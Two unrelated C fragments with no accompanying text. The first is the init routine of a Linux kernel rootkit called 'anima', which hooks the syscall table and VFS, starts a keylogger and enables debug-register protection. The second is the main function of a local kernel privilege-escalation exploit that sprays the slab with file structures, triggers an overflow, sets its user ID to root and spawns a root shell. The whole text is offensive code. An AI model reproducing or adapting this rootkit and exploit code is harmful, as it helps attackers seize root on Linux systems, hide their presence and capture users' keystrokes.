static int __init anima_init(void) { int ret; pr_debug("%s: init\n", __func__); /* MUST be called first */ ret = get_kernel_syms(); if (ret) return 0; /* architecture specific */ ret = arch_hw_breakpoint_init(); if (ret) return 0; arch_hw_breakpoint_debug(); if (rk_cfg.hook_syscall) hook_sys_call_table(); if (rk_cfg.hook_vfs) vfs_hook(); if (rk_cfg.keylogger) keylogger_init(); #if ARCH_X86 if (rk_cfg.dr_protect) x86_hw_breakpoint_protect_enable(); #endif rk_cfg.state = RK_ACTIVE; return 0; }
int main(int argc, char ** argv) { int i, nbfiles; int * files; char tmpfile[100]; get_kernel_syms(); files = malloc(sizeof(int)); //check_slabs(); /* Spray slab with file structs */ for (i=0;;i++) { sprintf(tmpfile, "/tmp/tmpfile%d", i); files = realloc(files, (i+1)*sizeof(int)); if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0) break; } //check_slabs(); printf("[+] Created %d files\n", nbfiles = i); /* We cannot check slab info * so may not be properly aligned * (should work with argv[1] = 3) */ for (i=0;i< (argc > 1 ? atoi(argv[1]) : 1);i++) { close(files[nbfiles-4-i]); } do_overflow(); for (i=0;i<nbfiles;i++) write(files[i], "YOUPI", 5); for (i=0;i<nbfiles;i++) close(files[i]); if (setresuid(0, 0, 0)) { printf("[-] Exploit failed :(\n"); exit(1); } setresgid(0, 0, 0); printf("[+] Launching root shell!\n"); execl("/bin/sh", "/bin/sh", NULL); return 1; }